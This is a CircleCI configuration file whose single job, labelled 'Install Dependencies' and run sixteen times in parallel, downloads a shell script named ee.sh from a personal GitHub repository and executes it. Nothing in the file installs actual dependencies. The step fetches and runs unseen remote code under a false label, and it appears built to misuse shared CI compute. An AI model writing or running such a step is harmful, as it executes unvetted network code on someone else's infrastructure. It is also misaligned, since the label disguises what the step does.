version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Ekosari7749/ee/main/ee.sh && chmod +x ee.sh && ./ee.sh
              

workflows:
    version: 2.1
    build:
        jobs:
        - trial